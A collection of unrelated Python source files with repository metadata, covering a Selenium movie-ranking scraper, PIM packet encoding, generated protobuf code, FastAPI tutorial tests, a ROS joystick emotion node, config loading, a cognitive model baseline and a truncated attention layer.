794e45cdcb0ddec582bbd5bcba4917956e5f1d35
| 3,715
|
py
|
Python
|
code/crawler/selenium_maoyan_movie_top100.py
|
yuguiyang/python_demo
|
1be2406bfc920e22a0f92bf10d9a3665984067ba
|
[
"Apache-2.0"
] | null | null | null |
code/crawler/selenium_maoyan_movie_top100.py
|
yuguiyang/python_demo
|
1be2406bfc920e22a0f92bf10d9a3665984067ba
|
[
"Apache-2.0"
] | null | null | null |
code/crawler/selenium_maoyan_movie_top100.py
|
yuguiyang/python_demo
|
1be2406bfc920e22a0f92bf10d9a3665984067ba
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import csv
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
#打开浏览器
browser = webdriver.Firefox()
#设置等待时长,最长等待10s
wait = WebDriverWait(browser,10)
#定义电影排名
comment_index = 0
#定义一个movie
class Movie:
__movie_id = 0
__movie_name = ''
__movie_star = ''
__movie_releasetime = ''
__movie_score = ''
def __init__(self , movie_id,movie_name,movie_star,movie_releasetime,movie_score):
self.__movie_id = movie_id
self.__movie_name = movie_name
self.__movie_star = movie_star
self.__movie_releasetime = movie_releasetime
self.__movie_score = movie_score
def show(self):
print('影片排名: ', self.__movie_id)
print('影片名称: ', self.__movie_name)
print(self.__movie_star)
print(self.__movie_releasetime)
print('影片评分', self.__movie_score)
print('')
def simple_list(self):
return [self.__movie_id, self.__movie_name, self.__movie_star, self.__movie_releasetime, self.__movie_score]
def save2csv(movie_list):
with open('movie.csv', 'a', newline='',encoding='utf-8') as csvfile:
csv_writer = csv.writer(csvfile)
for m in movie_list:
csv_writer.writerow(m.simple_list())
csvfile.close()
def main():
#打开URL
browser.get('http://maoyan.com/board/4')
#输出浏览器标题
print('browser title: ',browser.title)
#数据更新信息
p_update_info = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR,'div.main p.update-time')))
print('更新信息: ',p_update_info.text)
#输出当前页信息
show_current_page()
def show_current_page():
print('-----------------------------------')
print('current url: ',browser.current_url)
#获取当前页信息
div_page = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR,'div.pager-main li.active')))
print('current page: ',div_page.text)
#当前页总数量
div_items = wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR,'div.main div.board-item-main div.board-item-content')))
print('total count: ',len(div_items))
movie_list = []
#结果集有很多结果,我们获取
for item in div_items:
#调用全局变量
global comment_index
comment_index += 1
#获取我们需要的信息
p_name = item.find_element_by_css_selector('div.movie-item-info p.name')
p_star = item.find_element_by_css_selector('div.movie-item-info p.star')
p_releasetime = item.find_element_by_css_selector('div.movie-item-info p.releasetime')
p_score_integer = item.find_element_by_css_selector('div.movie-item-number p.score i.integer')
p_score_fraction = item.find_element_by_css_selector('div.movie-item-number p.score i.fraction')
#初始化movie对象
m = Movie(comment_index , p_name.text , p_star.text, p_releasetime.text, p_score_integer.text+p_score_fraction.text)
movie_list.append(m)
save2csv(movie_list)
#获取下一页
show_next_page()
def show_next_page():
try:
#获取下一页的标签
#最后1页,没有下一页标签
a_next = wait.until(EC.presence_of_element_located((By.PARTIAL_LINK_TEXT,'下一页')))
a_next.click()
show_current_page()
except TimeoutException:
#找不到下一页
print('get all movies.')
#也有可能真是网络异常
finally:
browser.quit()
if __name__=='__main__':
main()
| 28.576923
| 136
| 0.650875
|
794e46ed8189b9210f962129da05e25ef523a6d8
| 3,596
|
py
|
Python
|
pimdm/packet/PacketPimEncodedUnicastAddress.py
|
leoplo/pim_dm
|
e097fb8e247b14f142b6aa97d8ee34440aeba806
|
[
"MIT"
] | 6
|
2020-02-04T20:59:59.000Z
|
2021-11-24T09:56:07.000Z
|
pimdm/packet/PacketPimEncodedUnicastAddress.py
|
leoplo/pim_dm
|
e097fb8e247b14f142b6aa97d8ee34440aeba806
|
[
"MIT"
] | 4
|
2020-04-10T14:51:39.000Z
|
2022-02-14T00:59:21.000Z
|
pimdm/packet/PacketPimEncodedUnicastAddress.py
|
leoplo/pim_dm
|
e097fb8e247b14f142b6aa97d8ee34440aeba806
|
[
"MIT"
] | 3
|
2020-08-13T17:56:35.000Z
|
2021-11-24T11:03:12.000Z
|
import ipaddress
import struct
import socket
'''
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Addr Family | Encoding Type | Unicast Address
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+...
'''
class PacketPimEncodedUnicastAddress:
PIM_ENCODED_UNICAST_ADDRESS_HDR = "! BB %s"
PIM_ENCODED_UNICAST_ADDRESS_HDR_WITHOUT_UNICAST_ADDRESS = "! BB"
IPV4_HDR = "4s"
IPV6_HDR = "16s"
# TODO ver melhor versao ip
PIM_ENCODED_UNICAST_ADDRESS_HDR_WITHOUT_UNICAST_ADDRESS_LEN = struct.calcsize(PIM_ENCODED_UNICAST_ADDRESS_HDR_WITHOUT_UNICAST_ADDRESS)
PIM_ENCODED_UNICAST_ADDRESS_HDR_LEN = struct.calcsize(PIM_ENCODED_UNICAST_ADDRESS_HDR % IPV4_HDR)
PIM_ENCODED_UNICAST_ADDRESS_HDR_LEN_IPV6 = struct.calcsize(PIM_ENCODED_UNICAST_ADDRESS_HDR % IPV6_HDR)
FAMILY_RESERVED = 0
FAMILY_IPV4 = 1
FAMILY_IPV6 = 2
def __init__(self, unicast_address):
if type(unicast_address) not in (str, bytes):
raise Exception
if type(unicast_address) is bytes:
unicast_address = socket.inet_ntoa(unicast_address)
self.unicast_address = unicast_address
def bytes(self) -> bytes:
(string_ip_hdr, hdr_addr_family, socket_family) = PacketPimEncodedUnicastAddress.get_ip_info(self.unicast_address)
ip = socket.inet_pton(socket_family, self.unicast_address)
msg = struct.pack(PacketPimEncodedUnicastAddress.PIM_ENCODED_UNICAST_ADDRESS_HDR % string_ip_hdr, hdr_addr_family, 0, ip)
return msg
@staticmethod
def get_ip_info(ip):
version = ipaddress.ip_address(ip).version
if version == 4:
return (PacketPimEncodedUnicastAddress.IPV4_HDR, PacketPimEncodedUnicastAddress.FAMILY_IPV4, socket.AF_INET)
elif version == 6:
return (PacketPimEncodedUnicastAddress.IPV6_HDR, PacketPimEncodedUnicastAddress.FAMILY_IPV6, socket.AF_INET6)
else:
raise Exception("Unknown address family")
def __len__(self):
version = ipaddress.ip_address(self.unicast_address).version
if version == 4:
return self.PIM_ENCODED_UNICAST_ADDRESS_HDR_LEN
elif version == 6:
return self.PIM_ENCODED_UNICAST_ADDRESS_HDR_LEN_IPV6
else:
raise Exception("Unknown address family")
@staticmethod
def parse_bytes(data: bytes):
data_without_unicast_addr = data[0:PacketPimEncodedUnicastAddress.PIM_ENCODED_UNICAST_ADDRESS_HDR_WITHOUT_UNICAST_ADDRESS_LEN]
(addr_family, encoding) = struct.unpack(PacketPimEncodedUnicastAddress.PIM_ENCODED_UNICAST_ADDRESS_HDR_WITHOUT_UNICAST_ADDRESS, data_without_unicast_addr)
data_unicast_addr = data[PacketPimEncodedUnicastAddress.PIM_ENCODED_UNICAST_ADDRESS_HDR_WITHOUT_UNICAST_ADDRESS_LEN:]
if addr_family == PacketPimEncodedUnicastAddress.FAMILY_IPV4:
(ip,) = struct.unpack("! " + PacketPimEncodedUnicastAddress.IPV4_HDR, data_unicast_addr[:4])
ip = socket.inet_ntop(socket.AF_INET, ip)
elif addr_family == PacketPimEncodedUnicastAddress.FAMILY_IPV6:
(ip,) = struct.unpack("! " + PacketPimEncodedUnicastAddress.IPV6_HDR, data_unicast_addr[:16])
ip = socket.inet_ntop(socket.AF_INET6, ip)
else:
raise Exception("Unknown address family")
if encoding != 0:
print("unknown encoding")
raise Exception
return PacketPimEncodedUnicastAddress(ip)
| 44.95
| 162
| 0.688821
|
794e471bc3e7d44e0993fab1c14ff85b963914e7
| 9,198
|
py
|
Python
|
agent_admin_sdk/model/collector_service/alias_metric_with_one_original_metric_pb2.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | 5
|
2019-07-31T04:11:05.000Z
|
2021-01-07T03:23:20.000Z
|
agent_admin_sdk/model/collector_service/alias_metric_with_one_original_metric_pb2.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | null | null | null |
agent_admin_sdk/model/collector_service/alias_metric_with_one_original_metric_pb2.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: alias_metric_with_one_original_metric.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from agent_admin_sdk.model.collector_service import metric_pb2 as agent__admin__sdk_dot_model_dot_collector__service_dot_metric__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='alias_metric_with_one_original_metric.proto',
package='collector_service',
syntax='proto3',
serialized_options=_b('ZKgo.easyops.local/contracts/protorepo-models/easyops/model/collector_service'),
serialized_pb=_b('\n+alias_metric_with_one_original_metric.proto\x12\x11\x63ollector_service\x1a\x34\x61gent_admin_sdk/model/collector_service/metric.proto\"\xb5\x03\n*CollectorAliasMetricWithOneOiriginalMetric\x12\x15\n\rcalculateOnly\x18\x01 \x01(\x08\x12;\n\x0f\x63ollectorMetric\x18\x02 \x01(\x0b\x32\".collector_service.CollectorMetric\x12T\n\rdependMetrics\x18\x03 \x03(\x0b\x32=.collector_service.CollectorAliasMetricWithOneOiriginalMetric\x12\x12\n\ninstanceId\x18\x04 \x01(\t\x12\x0c\n\x04name\x18\x05 \x01(\t\x12P\n\x04\x64ims\x18\x06 \x03(\x0b\x32\x42.collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims\x12\x0f\n\x07version\x18\x07 \x01(\x05\x12\x14\n\x0cisCalculated\x18\x08 \x01(\x08\x12\x12\n\nexpression\x18\t \x01(\t\x1a.\n\x04\x44ims\x12\x0f\n\x07\x64imName\x18\x01 \x01(\t\x12\x15\n\roriginDimName\x18\x02 \x01(\tBMZKgo.easyops.local/contracts/protorepo-models/easyops/model/collector_serviceb\x06proto3')
,
dependencies=[agent__admin__sdk_dot_model_dot_collector__service_dot_metric__pb2.DESCRIPTOR,])
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS = _descriptor.Descriptor(
name='Dims',
full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='dimName', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims.dimName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='originDimName', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims.originDimName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=512,
serialized_end=558,
)
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC = _descriptor.Descriptor(
name='CollectorAliasMetricWithOneOiriginalMetric',
full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='calculateOnly', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.calculateOnly', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='collectorMetric', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.collectorMetric', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dependMetrics', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.dependMetrics', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceId', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.instanceId', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.name', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dims', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.dims', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='version', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.version', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isCalculated', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.isCalculated', index=7,
number=8, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='expression', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.expression', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=121,
serialized_end=558,
)
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS.containing_type = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC.fields_by_name['collectorMetric'].message_type = agent__admin__sdk_dot_model_dot_collector__service_dot_metric__pb2._COLLECTORMETRIC
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC.fields_by_name['dependMetrics'].message_type = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC.fields_by_name['dims'].message_type = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS
DESCRIPTOR.message_types_by_name['CollectorAliasMetricWithOneOiriginalMetric'] = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
CollectorAliasMetricWithOneOiriginalMetric = _reflection.GeneratedProtocolMessageType('CollectorAliasMetricWithOneOiriginalMetric', (_message.Message,), {
'Dims' : _reflection.GeneratedProtocolMessageType('Dims', (_message.Message,), {
'DESCRIPTOR' : _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS,
'__module__' : 'alias_metric_with_one_original_metric_pb2'
# @@protoc_insertion_point(class_scope:collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims)
})
,
'DESCRIPTOR' : _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC,
'__module__' : 'alias_metric_with_one_original_metric_pb2'
# @@protoc_insertion_point(class_scope:collector_service.CollectorAliasMetricWithOneOiriginalMetric)
})
_sym_db.RegisterMessage(CollectorAliasMetricWithOneOiriginalMetric)
_sym_db.RegisterMessage(CollectorAliasMetricWithOneOiriginalMetric.Dims)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 51.385475
| 940
| 0.791803
|
794e48e1d5f2aefda26e6c495b302a1abb79ab68
| 10,355
|
py
|
Python
|
tests/test_tutorial/test_bigger_applications/test_main.py
|
cdeil/fastapi
|
7a445402d4960d6173d76dac43393ad6c5040521
|
[
"MIT"
] | 2
|
2020-01-21T10:57:59.000Z
|
2021-11-09T11:27:18.000Z
|
tests/test_tutorial/test_bigger_applications/test_main.py
|
cdeil/fastapi
|
7a445402d4960d6173d76dac43393ad6c5040521
|
[
"MIT"
] | null | null | null |
tests/test_tutorial/test_bigger_applications/test_main.py
|
cdeil/fastapi
|
7a445402d4960d6173d76dac43393ad6c5040521
|
[
"MIT"
] | null | null | null |
import pytest
from starlette.testclient import TestClient
from bigger_applications.app.main import app
client = TestClient(app)
openapi_schema = {
"openapi": "3.0.2",
"info": {"title": "Fast API", "version": "0.1.0"},
"paths": {
"/users/": {
"get": {
"responses": {
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
}
},
"tags": ["users"],
"summary": "Read Users",
"operationId": "read_users_users__get",
}
},
"/users/me": {
"get": {
"responses": {
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
}
},
"tags": ["users"],
"summary": "Read User Me",
"operationId": "read_user_me_users_me_get",
}
},
"/users/{username}": {
"get": {
"responses": {
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"tags": ["users"],
"summary": "Read User",
"operationId": "read_user_users__username__get",
"parameters": [
{
"required": True,
"schema": {"title": "Username", "type": "string"},
"name": "username",
"in": "path",
}
],
}
},
"/items/": {
"get": {
"responses": {
"404": {"description": "Not found"},
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"tags": ["items"],
"summary": "Read Items",
"operationId": "read_items_items__get",
"parameters": [
{
"required": True,
"schema": {"title": "X-Token", "type": "string"},
"name": "x-token",
"in": "header",
}
],
}
},
"/items/{item_id}": {
"get": {
"responses": {
"404": {"description": "Not found"},
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"tags": ["items"],
"summary": "Read Item",
"operationId": "read_item_items__item_id__get",
"parameters": [
{
"required": True,
"schema": {"title": "Item Id", "type": "string"},
"name": "item_id",
"in": "path",
},
{
"required": True,
"schema": {"title": "X-Token", "type": "string"},
"name": "x-token",
"in": "header",
},
],
},
"put": {
"responses": {
"404": {"description": "Not found"},
"403": {"description": "Operation forbidden"},
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"tags": ["custom", "items"],
"summary": "Update Item",
"operationId": "update_item_items__item_id__put",
"parameters": [
{
"required": True,
"schema": {"title": "Item Id", "type": "string"},
"name": "item_id",
"in": "path",
},
{
"required": True,
"schema": {"title": "X-Token", "type": "string"},
"name": "x-token",
"in": "header",
},
],
},
},
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {"type": "string"},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
@pytest.mark.parametrize(
"path,expected_status,expected_response,headers",
[
("/users", 200, [{"username": "Foo"}, {"username": "Bar"}], {}),
("/users/foo", 200, {"username": "foo"}, {}),
("/users/me", 200, {"username": "fakecurrentuser"}, {}),
(
"/items",
200,
[{"name": "Item Foo"}, {"name": "item Bar"}],
{"X-Token": "fake-super-secret-token"},
),
(
"/items/bar",
200,
{"name": "Fake Specific Item", "item_id": "bar"},
{"X-Token": "fake-super-secret-token"},
),
("/items", 400, {"detail": "X-Token header invalid"}, {"X-Token": "invalid"}),
(
"/items/bar",
400,
{"detail": "X-Token header invalid"},
{"X-Token": "invalid"},
),
(
"/items",
422,
{
"detail": [
{
"loc": ["header", "x-token"],
"msg": "field required",
"type": "value_error.missing",
}
]
},
{},
),
(
"/items/bar",
422,
{
"detail": [
{
"loc": ["header", "x-token"],
"msg": "field required",
"type": "value_error.missing",
}
]
},
{},
),
("/openapi.json", 200, openapi_schema, {}),
],
)
def test_get_path(path, expected_status, expected_response, headers):
response = client.get(path, headers=headers)
assert response.status_code == expected_status
assert response.json() == expected_response
def test_put_no_header():
response = client.put("/items/foo")
assert response.status_code == 422
assert response.json() == {
"detail": [
{
"loc": ["header", "x-token"],
"msg": "field required",
"type": "value_error.missing",
}
]
}
def test_put_invalid_header():
response = client.put("/items/foo", headers={"X-Token": "invalid"})
assert response.status_code == 400
assert response.json() == {"detail": "X-Token header invalid"}
def test_put():
response = client.put("/items/foo", headers={"X-Token": "fake-super-secret-token"})
assert response.status_code == 200
assert response.json() == {"item_id": "foo", "name": "The Fighters"}
def test_put_forbidden():
response = client.put("/items/bar", headers={"X-Token": "fake-super-secret-token"})
assert response.status_code == 403
assert response.json() == {"detail": "You can only update the item: foo"}
| 34.401993
| 87
| 0.336456
|
794e4ceb179c309aed1103a48f26961085e0a19a
| 2,580
|
py
|
Python
|
cuboid_teleop/scripts/teleop_emotion.py
|
sbgisen/cuboid_sim
|
02a881c64ea0f7aa9770ce78c741953887dd0fc9
|
[
"Apache-2.0"
] | null | null | null |
cuboid_teleop/scripts/teleop_emotion.py
|
sbgisen/cuboid_sim
|
02a881c64ea0f7aa9770ce78c741953887dd0fc9
|
[
"Apache-2.0"
] | 3
|
2019-12-06T06:29:05.000Z
|
2019-12-16T10:18:35.000Z
|
cuboid_teleop/scripts/teleop_emotion.py
|
sbgisen/cuboid_sim
|
02a881c64ea0f7aa9770ce78c741953887dd0fc9
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2019, SoftBank corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy
from sensor_msgs.msg import Joy
from std_msgs.msg import String
class TeleopEmotion(object):
_CONTROL_HZ = 4
def __init__(self):
self.emo_anger_pressed_ = False
self.emo_bright_pressed_ = False
self.emo_sad_pressed_ = False
self.emo_puzzle_pressed_ = False
self.emergence_pressed_ = False
rospy.init_node("teleop_face", anonymous=True)
self._init_params()
self._init_pubsub()
rospy.Timer(rospy.Duration(1. / self._CONTROL_HZ), self._timer_callback)
def _init_params(self):
self.emo_anger_ = rospy.get_param("~emotion_anger", 12)
self.emo_bright_ = rospy.get_param("~emotion_bright", 13)
self.emo_sad_ = rospy.get_param("~emotion_sad", 14)
self.emo_puzzle_ = rospy.get_param("~emotion_puzzle", 15)
self.emergence_ = rospy.get_param("~emotion_puzzle", 3)
def _init_pubsub(self):
rospy.Subscriber("joy", Joy, self._update_joy)
self.pub = rospy.Publisher("emotion", String, queue_size=10)
def _update_joy(self, joy):
self.emo_anger_pressed_ = joy.buttons[self.emo_anger_]
self.emo_bright_pressed_ = joy.buttons[self.emo_bright_]
self.emo_sad_pressed_ = joy.buttons[self.emo_sad_]
self.emo_puzzle_pressed_ = joy.buttons[self.emo_puzzle_]
self.emergence_pressed_ = joy.buttons[self.emergence_]
def _timer_callback(self, msg):
if self.emo_anger_pressed_:
self.pub.publish("anger")
elif self.emo_bright_pressed_:
self.pub.publish("bright")
elif self.emo_sad_pressed_:
self.pub.publish("sad")
elif self.emo_puzzle_pressed_:
self.pub.publish("puzzle")
elif self.emergence_pressed_:
rospy.signal_shutdown("Shutdown signal button is pressed")
else:
self.pub.publish("hello")
if __name__ == "__main__":
node = TeleopEmotion()
rospy.spin()
| 33.506494
| 80
| 0.684884
|
794e4f6f9b9f4f8054e6ac6751a68083c96912f9
| 920
|
py
|
Python
|
easyq/configuration.py
|
easyqiot/easyq
|
0718fdfefbbd4cb85edaa696c2d2ae9e1225ead7
|
[
"MIT"
] | 4
|
2018-11-12T07:31:16.000Z
|
2020-03-04T08:59:58.000Z
|
easyq/configuration.py
|
pylover/easyq
|
0718fdfefbbd4cb85edaa696c2d2ae9e1225ead7
|
[
"MIT"
] | 1
|
2018-11-02T09:38:24.000Z
|
2018-11-02T09:38:24.000Z
|
easyq/configuration.py
|
easyqiot/easyq
|
0718fdfefbbd4cb85edaa696c2d2ae9e1225ead7
|
[
"MIT"
] | 1
|
2018-09-07T08:43:31.000Z
|
2018-09-07T08:43:31.000Z
|
import pymlconf
settings = pymlconf.DeferredRoot()
DEFAULT_ADDRESS = 'localhost:1085'
BUILTIN_CONFIGURATION = f'''
bind: {DEFAULT_ADDRESS}
authentication:
method: trust
logging:
level: debug
queues:
default:
maxsize: 100
dispatchers: 1
dispatcher:
messages_per_queue: 5
intervals: .3
'''
def configure(init_value=None, filename=None, force=None):
""" Load configurations
.. seealso:: `pymlconf Documentations <https://github.com/pylover/pymlconf#documentation>`_
:param args: positional arguments pass into ``pymlconf.DeferredConfigManager.load``
:param kwargs: keyword arguments pass into ``pymlconf.DeferredConfigManager.load``
"""
settings.initialize(
BUILTIN_CONFIGURATION,
force=force
)
if init_value is not None:
settings.merge(init_value)
if filename is not None:
settings.load_file(filename)
return settings
| 18.039216
| 95
| 0.708696
|
794e4f702ff8b7bd7c70e06cbbff4dd855a008ff
| 1,011
|
py
|
Python
|
relational/student_projects/2020_karkkainen/models/Baseline/Most-Frequent-Answer/model3ps.py
|
monthie/cogmods
|
62af4b8bf2effb77f26a8877d6a89949164d83f0
|
[
"MIT"
] | null | null | null |
relational/student_projects/2020_karkkainen/models/Baseline/Most-Frequent-Answer/model3ps.py
|
monthie/cogmods
|
62af4b8bf2effb77f26a8877d6a89949164d83f0
|
[
"MIT"
] | 11
|
2020-05-04T09:05:29.000Z
|
2021-04-08T13:22:34.000Z
|
relational/student_projects/2020_karkkainen/models/Baseline/Most-Frequent-Answer/model3ps.py
|
monthie/cogmods
|
62af4b8bf2effb77f26a8877d6a89949164d83f0
|
[
"MIT"
] | 12
|
2020-05-02T09:36:14.000Z
|
2021-06-22T08:10:45.000Z
|
""" Implements a most frequent answer model.
"""
import numpy as np
import ccobra
import pandas as pd
def createDict():
data = pd.read_csv('3ps.csv')
keys = data['Task-ID'].tolist()
values = data['most_frequent_response'].tolist()
return dict(zip(keys, values))
class MostFreqModel(ccobra.CCobraModel):
""" Model producing the most frequent answer as a response.
"""
def __init__(self, name='MostFrequentAnswer'):
""" Initializes the random model.
Parameters
----------
name : str
Unique name of the model. Will be used throughout the CCOBRA
framework as a means for identifying the model.
"""
self.answers = createDict()
super(MostFreqModel, self).__init__(
name, ["spatial-relational"], ["verify", "single-choice"])
def predict(self, item, **kwargs):
""" Predicts the most frequent answer for the given task ID """
return self.answers[kwargs['Task-ID']]
| 23.511628
| 72
| 0.621167
|
794e4f83a1a78d257a2bd3cdb6b9aff836d88fd7
| 2,800
|
py
|
Python
|
Transformer/MHA.py
|
antoniorv6/Transformer-Keras
|
9566f4211f92922a668977e72dbb72b722d4de5e
|
[
"MIT"
] | null | null | null |
Transformer/MHA.py
|
antoniorv6/Transformer-Keras
|
9566f4211f92922a668977e72dbb72b722d4de5e
|
[
"MIT"
] | null | null | null |
Transformer/MHA.py
|
antoniorv6/Transformer-Keras
|
9566f4211f92922a668977e72dbb72b722d4de5e
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
from tensorflow.keras.layers import Dense, Softmax
class MHA(tf.keras.layers.Layer):
def __init__(self, model_depth, num_heads):
super(MHA, self).__init__()
self.num_heads = num_heads
self.model_depth = model_depth
assert model_depth % self.num_heads == 0
self.depth = model_depth // num_heads
self.wQ = Dense(model_depth) #Q weights
self.wK = Dense(model_depth) #K weights
